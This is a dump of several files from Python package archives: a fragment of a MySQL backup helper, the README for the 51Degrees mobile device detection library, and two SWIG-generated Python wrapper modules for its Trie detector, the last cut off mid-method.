def backup_by_table(self):
pass
def backup_all(self, **kwargs):
exclude_db = kwargs.get('exclude_db', [])
db_list = [val for val in self.select_database() if val not in exclude_db]
logging.info('db_list: {}'.format(db_list))
for db in db_list:
self.backup_by_database(db)
logging.info('{} backup all finished'.format(self.host)) | 51PubModules | /51PubModules-0.0.2.tar.gz/51PubModules-0.0.2/opmysql/mysqldb.py | mysqldb.py |
|51degrees|
Device Detection Python API
51Degrees Mobile Detector is a server side mobile detection solution.
Changelog
====================
- Fixed a bug where an additional compile argument was causing compilation errors with clang.
- Updated the v3-trie-wrapper package to include the Lite Hash Trie data file.
- Updated Lite Pattern data file for November.
- Updated Lite Hash Trie data file for November.
General
========
Before you start matching user agents, you may wish to configure the solution to use a different database. You can easily generate a sample settings file running the following command
$ 51degrees-mobile-detector settings > ~/51degrees-mobile-detector.settings.py
The core ``51degrees-mobile-detector`` is included as a dependency when installing either the ``51degrees-mobile-detector-v3-wrapper`` or ``51degrees-mobile-detector-v3-wrapper`` packages.
During install a directory which contains your data file will be created in ``~\51Degrees``.
Settings
=========
General Settings
----------------
- ``DETECTION_METHOD`` (defaults to 'v3-wrapper'). Sets the preferred mobile device detection method. Available options are v3-wrapper (requires 51degrees-mobile-detector-v3-wrapper package), v3-trie-wrapper
- ``PROPERTIES`` (defaults to ''). List of case-sensitive property names to be fetched on every device detection. Leave empty to fetch all available properties.
- ``LICENCE`` Your 51Degrees license key for enhanced device data. This is required if you want to set up the automatic 51degrees-mobile-detector-premium-pattern-wrapper package updates.
Trie Detector settings
-----------------------
- ``V3_TRIE_WRAPPER_DATABASE`` Location of the Hash Trie data file.
Pattern Detector settings
--------------------------
- ``V3_WRAPPER_DATABASE`` Location of the Pattern data file.
- ``CACHE_SIZE`` (defaults to 10000). Sets the size of the workset cache.
- ``POOL_SIZE`` (defaults to 20). Sets the size of the workset pool.
Usage Sharer Settings
----------------------
- ``USAGE_SHARER_ENABLED`` (defaults to True). Indicates if usage data should be shared with 51Degrees.com. We recommended leaving this value unchanged to ensure we're improving the performance and accuracy of the solution.
- Adavanced usage sharer settings are detailed in your settings file.
Automatic Updates
------------------
If you want to set up automatic updates, add your license key to your settings and add the following command to your cron
$ 51degrees-mobile-detector update-premium-pattern-wrapper
NOTE: Currently auto updates are only available with our Pattern API.
Usage
======
Core
-----
By executing the following a useful help page will be displayed explaining basic usage.
$ 51degrees-mobile-detector
To check everything is set up , try fetching a match with
$ 51degrees-mobile-detector match "Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Mobile/9B176"
Examples
=========
Additional examples can be found on our GitHub_ repository.
User Support
============
If you have any issues please get in touch with our Support_ or open an issue on our GitHub_ repository.
.. |51degrees| image:: https://51degrees.com/DesktopModules/FiftyOne/Distributor/Logo.ashx?utm_source=github&utm_medium=repository&utm_content=readme_pattern&utm_campaign=python-open-source
:target: https://51degrees.com
.. _GitHub: https://github.com/51Degrees/Device-Detection/tree/master/python
.. _Support: support@51degrees.com
| 51degrees-mobile-detector-v3-trie-wrapper | /51degrees-mobile-detector-v3-trie-wrapper-3.2.18.4.tar.gz/51degrees-mobile-detector-v3-trie-wrapper-3.2.18.4/README.rst | README.rst |
from sys import version_info as _swig_python_version_info
if _swig_python_version_info >= (2, 7, 0):
def swig_import_helper():
import importlib
pkg = __name__.rpartition('.')[0]
mname = '.'.join((pkg, '_FiftyOneDegreesTrieV3')).lstrip('.')
try:
return importlib.import_module(mname)
except ImportError:
return importlib.import_module('_FiftyOneDegreesTrieV3')
_FiftyOneDegreesTrieV3 = swig_import_helper()
del swig_import_helper
elif _swig_python_version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_FiftyOneDegreesTrieV3', [dirname(__file__)])
except ImportError:
import _FiftyOneDegreesTrieV3
return _FiftyOneDegreesTrieV3
try:
_mod = imp.load_module('_FiftyOneDegreesTrieV3', fp, pathname, description)
finally:
if fp is not None:
fp.close()
return _mod
_FiftyOneDegreesTrieV3 = swig_import_helper()
del swig_import_helper
else:
import _FiftyOneDegreesTrieV3
del _swig_python_version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
try:
import builtins as __builtin__
except ImportError:
import __builtin__
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr(self, class_type, name):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
raise AttributeError("'%s' object has no attribute '%s'" % (class_type.__name__, name))
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except __builtin__.Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except __builtin__.Exception:
class _object:
pass
_newclass = 0
class SwigPyIterator(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, SwigPyIterator, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, SwigPyIterator, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _FiftyOneDegreesTrieV3.delete_SwigPyIterator
__del__ = lambda self: None
def value(self):
return _FiftyOneDegreesTrieV3.SwigPyIterator_value(self)
def incr(self, n=1):
return _FiftyOneDegreesTrieV3.SwigPyIterator_incr(self, n)
def decr(self, n=1):
return _FiftyOneDegreesTrieV3.SwigPyIterator_decr(self, n)
def distance(self, x):
return _FiftyOneDegreesTrieV3.SwigPyIterator_distance(self, x)
def equal(self, x):
return _FiftyOneDegreesTrieV3.SwigPyIterator_equal(self, x)
def copy(self):
return _FiftyOneDegreesTrieV3.SwigPyIterator_copy(self)
def next(self):
return _FiftyOneDegreesTrieV3.SwigPyIterator_next(self)
def __next__(self):
return _FiftyOneDegreesTrieV3.SwigPyIterator___next__(self)
def previous(self):
return _FiftyOneDegreesTrieV3.SwigPyIterator_previous(self)
def advance(self, n):
return _FiftyOneDegreesTrieV3.SwigPyIterator_advance(self, n)
def __eq__(self, x):
return _FiftyOneDegreesTrieV3.SwigPyIterator___eq__(self, x)
def __ne__(self, x):
return _FiftyOneDegreesTrieV3.SwigPyIterator___ne__(self, x)
def __iadd__(self, n):
return _FiftyOneDegreesTrieV3.SwigPyIterator___iadd__(self, n)
def __isub__(self, n):
return _FiftyOneDegreesTrieV3.SwigPyIterator___isub__(self, n)
def __add__(self, n):
return _FiftyOneDegreesTrieV3.SwigPyIterator___add__(self, n)
def __sub__(self, *args):
return _FiftyOneDegreesTrieV3.SwigPyIterator___sub__(self, *args)
def __iter__(self):
return self
SwigPyIterator_swigregister = _FiftyOneDegreesTrieV3.SwigPyIterator_swigregister
SwigPyIterator_swigregister(SwigPyIterator)
class MapStringString(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, MapStringString, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, MapStringString, name)
__repr__ = _swig_repr
def iterator(self):
return _FiftyOneDegreesTrieV3.MapStringString_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
return _FiftyOneDegreesTrieV3.MapStringString___nonzero__(self)
def __bool__(self):
return _FiftyOneDegreesTrieV3.MapStringString___bool__(self)
def __len__(self):
return _FiftyOneDegreesTrieV3.MapStringString___len__(self)
def __iter__(self):
return self.key_iterator()
def iterkeys(self):
return self.key_iterator()
def itervalues(self):
return self.value_iterator()
def iteritems(self):
return self.iterator()
def __getitem__(self, key):
return _FiftyOneDegreesTrieV3.MapStringString___getitem__(self, key)
def __delitem__(self, key):
return _FiftyOneDegreesTrieV3.MapStringString___delitem__(self, key)
def has_key(self, key):
return _FiftyOneDegreesTrieV3.MapStringString_has_key(self, key)
def keys(self):
return _FiftyOneDegreesTrieV3.MapStringString_keys(self)
def values(self):
return _FiftyOneDegreesTrieV3.MapStringString_values(self)
def items(self):
return _FiftyOneDegreesTrieV3.MapStringString_items(self)
def __contains__(self, key):
return _FiftyOneDegreesTrieV3.MapStringString___contains__(self, key)
def key_iterator(self):
return _FiftyOneDegreesTrieV3.MapStringString_key_iterator(self)
def value_iterator(self):
return _FiftyOneDegreesTrieV3.MapStringString_value_iterator(self)
def __setitem__(self, *args):
return _FiftyOneDegreesTrieV3.MapStringString___setitem__(self, *args)
def asdict(self):
return _FiftyOneDegreesTrieV3.MapStringString_asdict(self)
def __init__(self, *args):
this = _FiftyOneDegreesTrieV3.new_MapStringString(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def empty(self):
return _FiftyOneDegreesTrieV3.MapStringString_empty(self)
def size(self):
return _FiftyOneDegreesTrieV3.MapStringString_size(self)
def swap(self, v):
return _FiftyOneDegreesTrieV3.MapStringString_swap(self, v)
def begin(self):
return _FiftyOneDegreesTrieV3.MapStringString_begin(self)
def end(self):
return _FiftyOneDegreesTrieV3.MapStringString_end(self)
def rbegin(self):
return _FiftyOneDegreesTrieV3.MapStringString_rbegin(self)
def rend(self):
return _FiftyOneDegreesTrieV3.MapStringString_rend(self)
def clear(self):
return _FiftyOneDegreesTrieV3.MapStringString_clear(self)
def get_allocator(self):
return _FiftyOneDegreesTrieV3.MapStringString_get_allocator(self)
def count(self, x):
return _FiftyOneDegreesTrieV3.MapStringString_count(self, x)
def erase(self, *args):
return _FiftyOneDegreesTrieV3.MapStringString_erase(self, *args)
def find(self, x):
return _FiftyOneDegreesTrieV3.MapStringString_find(self, x)
def lower_bound(self, x):
return _FiftyOneDegreesTrieV3.MapStringString_lower_bound(self, x)
def upper_bound(self, x):
return _FiftyOneDegreesTrieV3.MapStringString_upper_bound(self, x)
__swig_destroy__ = _FiftyOneDegreesTrieV3.delete_MapStringString
__del__ = lambda self: None
MapStringString_swigregister = _FiftyOneDegreesTrieV3.MapStringString_swigregister
MapStringString_swigregister(MapStringString)
class VectorString(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, VectorString, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, VectorString, name)
__repr__ = _swig_repr
def iterator(self):
return _FiftyOneDegreesTrieV3.VectorString_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
return _FiftyOneDegreesTrieV3.VectorString___nonzero__(self)
def __bool__(self):
return _FiftyOneDegreesTrieV3.VectorString___bool__(self)
def __len__(self):
return _FiftyOneDegreesTrieV3.VectorString___len__(self)
def __getslice__(self, i, j):
return _FiftyOneDegreesTrieV3.VectorString___getslice__(self, i, j)
def __setslice__(self, *args):
return _FiftyOneDegreesTrieV3.VectorString___setslice__(self, *args)
def __delslice__(self, i, j):
return _FiftyOneDegreesTrieV3.VectorString___delslice__(self, i, j)
def __delitem__(self, *args):
return _FiftyOneDegreesTrieV3.VectorString___delitem__(self, *args)
def __getitem__(self, *args):
return _FiftyOneDegreesTrieV3.VectorString___getitem__(self, *args)
def __setitem__(self, *args):
return _FiftyOneDegreesTrieV3.VectorString___setitem__(self, *args)
def pop(self):
return _FiftyOneDegreesTrieV3.VectorString_pop(self)
def append(self, x):
return _FiftyOneDegreesTrieV3.VectorString_append(self, x)
def empty(self):
return _FiftyOneDegreesTrieV3.VectorString_empty(self)
def size(self):
return _FiftyOneDegreesTrieV3.VectorString_size(self)
def swap(self, v):
return _FiftyOneDegreesTrieV3.VectorString_swap(self, v)
def begin(self):
return _FiftyOneDegreesTrieV3.VectorString_begin(self)
def end(self):
return _FiftyOneDegreesTrieV3.VectorString_end(self)
def rbegin(self):
return _FiftyOneDegreesTrieV3.VectorString_rbegin(self)
def rend(self):
return _FiftyOneDegreesTrieV3.VectorString_rend(self)
def clear(self):
return _FiftyOneDegreesTrieV3.VectorString_clear(self)
def get_allocator(self):
return _FiftyOneDegreesTrieV3.VectorString_get_allocator(self)
def pop_back(self):
return _FiftyOneDegreesTrieV3.VectorString_pop_back(self)
def erase(self, *args):
return _FiftyOneDegreesTrieV3.VectorString_erase(self, *args)
def __init__(self, *args):
this = _FiftyOneDegreesTrieV3.new_VectorString(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
return _FiftyOneDegreesTrieV3.VectorString_push_back(self, x)
def front(self):
return _FiftyOneDegreesTrieV3.VectorString_front(self)
def back(self):
return _FiftyOneDegreesTrieV3.VectorString_back(self)
def assign(self, n, x):
return _FiftyOneDegreesTrieV3.VectorString_assign(self, n, x)
def resize(self, *args):
return _FiftyOneDegreesTrieV3.VectorString_resize(self, *args)
def insert(self, *args):
return _FiftyOneDegreesTrieV3.VectorString_insert(self, *args)
def reserve(self, n):
return _FiftyOneDegreesTrieV3.VectorString_reserve(self, n)
def capacity(self):
return _FiftyOneDegreesTrieV3.VectorString_capacity(self)
__swig_destroy__ = _FiftyOneDegreesTrieV3.delete_VectorString
__del__ = lambda self: None
VectorString_swigregister = _FiftyOneDegreesTrieV3.VectorString_swigregister
VectorString_swigregister(VectorString)
class Match(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Match, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Match, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined")
__repr__ = _swig_repr
__swig_destroy__ = _FiftyOneDegreesTrieV3.delete_Match
__del__ = lambda self: None
def getValues(self, *args):
return _FiftyOneDegreesTrieV3.Match_getValues(self, *args)
def getValue(self, *args):
return _FiftyOneDegreesTrieV3.Match_getValue(self, *args)
def getDeviceId(self):
return _FiftyOneDegreesTrieV3.Match_getDeviceId(self)
def getRank(self):
return _FiftyOneDegreesTrieV3.Match_getRank(self)
def getDifference(self):
return _FiftyOneDegreesTrieV3.Match_getDifference(self)
def getMethod(self):
return _FiftyOneDegreesTrieV3.Match_getMethod(self)
def getUserAgent(self):
return _FiftyOneDegreesTrieV3.Match_getUserAgent(self)
Match_swigregister = _FiftyOneDegreesTrieV3.Match_swigregister
Match_swigregister(Match)
class Provider(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Provider, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Provider, name)
__repr__ = _swig_repr
__swig_destroy__ = _FiftyOneDegreesTrieV3.delete_Provider
__del__ = lambda self: None
def getHttpHeaders(self):
return _FiftyOneDegreesTrieV3.Provider_getHttpHeaders(self)
def getAvailableProperties(self):
return _FiftyOneDegreesTrieV3.Provider_getAvailableProperties(self)
def getDataSetName(self):
return _FiftyOneDegreesTrieV3.Provider_getDataSetName(self)
def getDataSetFormat(self):
return _FiftyOneDegreesTrieV3.Provider_getDataSetFormat(self)
def getDataSetPublishedDate(self):
return _FiftyOneDegreesTrieV3.Provider_getDataSetPublishedDate(self)
def getDataSetNextUpdateDate(self):
return _FiftyOneDegreesTrieV3.Provider_getDataSetNextUpdateDate(self)
def getDataSetSignatureCount(self):
return _FiftyOneDegreesTrieV3.Provider_getDataSetSignatureCount(self)
def getDataSetDeviceCombinations(self):
return _FiftyOneDegreesTrieV3.Provider_getDataSetDeviceCombinations(self)
def getMatch(self, *args):
return _FiftyOneDegreesTrieV3.Provider_getMatch(self, *args)
def getMatchWithTolerances(self, *args):
return _FiftyOneDegreesTrieV3.Provider_getMatchWithTolerances(self, *args)
def getMatchJson(self, *args):
return _FiftyOneDegreesTrieV3.Provider_getMatchJson(self, *args)
def setDrift(self, drift):
return _FiftyOneDegreesTrieV3.Provider_setDrift(self, drift)
def setDifference(self, difference):
return _FiftyOneDegreesTrieV3.Provider_setDifference(self, difference)
def reloadFromFile(self):
return _FiftyOneDegreesTrieV3.Provider_reloadFromFile(self)
def reloadFromMemory(self, source, size):
return _FiftyOneDegreesTrieV3.Provider_reloadFromMemory(self, source, size)
def getIsThreadSafe(self):
return _FiftyOneDegreesTrieV3.Provider_getIsThreadSafe(self)
def __init__(self, *args):
this = _FiftyOneDegreesTrieV3.new_Provider(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
Provider_swigregister = _FiftyOneDegreesTrieV3.Provider_swigregister
Provider_swigregister(Provider)
# This file is compatible with both classic and new-style classes. | 51degrees-mobile-detector-v3-trie-wrapper | /51degrees-mobile-detector-v3-trie-wrapper-3.2.18.4.tar.gz/51degrees-mobile-detector-v3-trie-wrapper-3.2.18.4/src/trie/FiftyOneDegreesTrieV3.py | FiftyOneDegreesTrieV3.py |
from sys import version_info as _swig_python_version_info
if _swig_python_version_info < (2, 7, 0):
raise RuntimeError('Python 2.7 or later required')
def swig_import_helper():
import importlib
pkg = __name__.rpartition('.')[0]
mname = '.'.join((pkg, '_fiftyone_degrees_mobile_detector_v3_trie_wrapper')).lstrip('.')
try:
return importlib.import_module(mname)
except ImportError:
return importlib.import_module('_fiftyone_degrees_mobile_detector_v3_trie_wrapper')
_fiftyone_degrees_mobile_detector_v3_trie_wrapper = swig_import_helper()
del swig_import_helper
del _swig_python_version_info
try:
import builtins as __builtin__
except ImportError:
import __builtin__
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if name == "thisown":
return self.this.own(value)
if name == "this":
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if not static:
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr(self, class_type, name):
if name == "thisown":
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
raise AttributeError("'%s' object has no attribute '%s'" % (class_type.__name__, name))
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except __builtin__.Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except __builtin__.Exception:
class _object:
pass
_newclass = 0
class SwigPyIterator(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, SwigPyIterator, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, SwigPyIterator, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_trie_wrapper.delete_SwigPyIterator
def __del__(self):
return None
def value(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator_value(self)
def incr(self, n=1):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator_incr(self, n)
def decr(self, n=1):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator_decr(self, n)
def distance(self, x):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator_distance(self, x)
def equal(self, x):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator_equal(self, x)
def copy(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator_copy(self)
def next(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator_next(self)
def __next__(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator___next__(self)
def previous(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator_previous(self)
def advance(self, n):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator_advance(self, n)
def __eq__(self, x):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator___eq__(self, x)
def __ne__(self, x):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator___ne__(self, x)
def __iadd__(self, n):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator___iadd__(self, n)
def __isub__(self, n):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator___isub__(self, n)
def __add__(self, n):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator___add__(self, n)
def __sub__(self, *args):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator___sub__(self, *args)
def __iter__(self):
return self
# Register SwigPyIterator in _fiftyone_degrees_mobile_detector_v3_trie_wrapper:
_fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator_swigregister(SwigPyIterator)
class MapStringString(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, MapStringString, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, MapStringString, name)
__repr__ = _swig_repr
def iterator(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString___nonzero__(self)
def __bool__(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString___bool__(self)
def __len__(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString___len__(self)
def __iter__(self):
return self.key_iterator()
def iterkeys(self):
return self.key_iterator()
def itervalues(self):
return self.value_iterator()
def iteritems(self):
return self.iterator()
def __getitem__(self, key):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString___getitem__(self, key)
def __delitem__(self, key):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString___delitem__(self, key)
def has_key(self, key):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_has_key(self, key)
def keys(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_keys(self)
def values(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_values(self)
def items(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_items(self)
def __contains__(self, key):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString___contains__(self, key)
def key_iterator(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_key_iterator(self)
def value_iterator(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_value_iterator(self)
def __setitem__(self, *args):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString___setitem__(self, *args)
def asdict(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_asdict(self)
def __init__(self, *args):
this = _fiftyone_degrees_mobile_detector_v3_trie_wrapper.new_MapStringString(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def empty(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_empty(self)
def size(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_size(self)
def swap(self, v):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_swap(self, v)
def begin(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_begin(self)
def end(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_end(self)
def rbegin(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_rbegin(self)
def rend(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_rend(self)
def clear(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_clear(self)
def get_allocator(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_get_allocator(self)
def count(self, x):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_count(self, x)
def erase(self, *args):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_erase(self, *args)
def find(self, x):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_find(self, x)
def lower_bound(self, x):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_lower_bound(self, x)
def upper_bound(self, x):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_upper_bound(self, x)
__swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_trie_wrapper.delete_MapStringString
def __del__(self):
return None
# Register MapStringString in _fiftyone_degrees_mobile_detector_v3_trie_wrapper:
_fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_swigregister(MapStringString)
class VectorString(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, VectorString, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, VectorString, name)
__repr__ = _swig_repr
def iterator(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString___nonzero__(self)
def __bool__(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString___bool__(self)
def __len__(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString___len__(self)
def __getslice__(self, i, j):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString___getslice__(self, i, j)
def __setslice__(self, *args):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString___setslice__(self, *args)
def __delslice__(self, i, j):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString___delslice__(self, i, j)
def __delitem__(self, *args):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString___delitem__(self, *args)
def __getitem__(self, *args):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString___getitem__(self, *args)
def __setitem__(self, *args):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString___setitem__(self, *args)
def pop(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_pop(self)
def append(self, x):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_append(self, x)
def empty(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_empty(self)
def size(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_size(self)
def swap(self, v):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_swap(self, v)
def begin(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_begin(self)
def end(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_end(self)
def rbegin(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_rbegin(self)
def rend(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_rend(self)
def clear(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_clear(self)
def get_allocator(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_get_allocator(self)
def pop_back(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_pop_back(self)
def erase(self, *args):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_erase(self, *args)
def __init__(self, *args):
this = _fiftyone_degrees_mobile_detector_v3_trie_wrapper.new_VectorString(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_push_back(self, x)
def front(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_front(self)
def back(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_back(self)
def assign(self, n, x):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_assign(self, n, x)
def resize(self, *args):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_resize(self, *args)
def insert(self, *args):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_insert(self, *args)
def reserve(self, n):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_reserve(self, n)
def capacity(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_capacity(self)
__swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_trie_wrapper.delete_VectorString
def __del__(self):
return None
# Register VectorString in _fiftyone_degrees_mobile_detector_v3_trie_wrapper:
_fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_swigregister(VectorString)
class Match(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Match, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Match, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined")
__repr__ = _swig_repr
__swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_trie_wrapper.delete_Match
def __del__(self):
return None
def getValues(self, *args):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_getValues(self, *args)
def getValue(self, *args):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_getValue(self, *args)
def getValueAsBool(self, *args):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_getValueAsBool(self, *args)
def getValueAsInteger(self, *args):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_getValueAsInteger(self, *args)
def getValueAsDouble(self, *args):
